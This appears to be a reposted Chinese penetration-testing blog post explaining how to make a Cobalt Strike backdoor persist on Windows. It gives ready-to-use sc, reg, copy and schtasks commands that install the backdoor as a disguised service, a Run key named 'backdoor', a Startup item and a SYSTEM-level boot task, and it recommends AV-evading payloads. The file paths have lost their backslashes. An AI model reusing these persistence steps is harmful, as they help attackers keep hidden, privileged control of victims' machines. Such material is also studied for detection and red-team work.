CS后门实现windows下持久化Tips

admin 2022年4月10日00:23:09安全文章评论45 views1063字阅读3分32秒阅读模式
1 前言
    后门利用持久化是内外渗透一项基本功,平常程序主要通过系统服务、注册表、开始菜单启动等三种方式实现程序自启,后门也是如此。
    首先使用cobalt strike生成木马程序,这里可以看到已经有一台受控端上线。 
CS后门实现windows下持久化Tips

2 系统服务自启
    直接控制台执行以下命令即可,或者直接新建个bat文件-上传-执行也可以
sc create "Share" binpath= "C:UsersxiaomDesktoptest.exe"sc description "Share" "Windwos文件共享服务"sc config "Share" start= autonet start "Share"
CS后门实现windows下持久化Tips
    默认情况下,会提示拒绝访问,意思是权限不够。
CS后门实现windows下持久化Tips
    可以看到已经上线,但是几秒后就关闭了。因为直接使用cs生成的exe木马无法通过服务自启动,会报错:服务没有及时响应启动或控制请求。
    可以使用免杀马通过以上方式实现自启,并且还是system权限。
CS后门实现windows下持久化Tips

3 注册表自启
    利用控制台reg命令新增一个名为“后门”的自启项,权限是管理员,但不是system。
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "后门" /t REG_SZ /d "C:UsersxiaomDesktoptest.exe" /f
CS后门实现windows下持久化Tips

4 开始菜单自启
    利用copy将后门复制到开始菜单中的“启动”里面也可以实现自启。比较简单就不配图了。权限是管理员,但不是system
copy C:usersxiaomdesktoptest.exe "%programdata%MicrosoftWindowsStart MenuProgramsStartup"

5 计划任务自启
    任务计划自启是最近恶意软件经常使用的手段,使用简单更隐蔽。
    通过下面命令,可以实现开机自启,且为system权限~,非常强大。 
schtasks /create /tn "后门" /tr C:usersxiaomdesktoptest.exe /sc onstart /NP /ru "System" start %systemroot% tasks
CS后门实现windows下持久化Tips
CS后门实现windows下持久化Tips
    若要删除任务
schtasks /delete /tn "后门" /F

6 结尾
    文章出处“来源梦屿千寻个人博客”。
http://www.baikesec.com/webstudy/penetration/38.html

原文始发于微信公众号(Reset安全):CS后门实现windows下持久化Tips

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月10日00:23:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CS后门实现windows下持久化Tips http://cn-sec.com/archives/724286.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: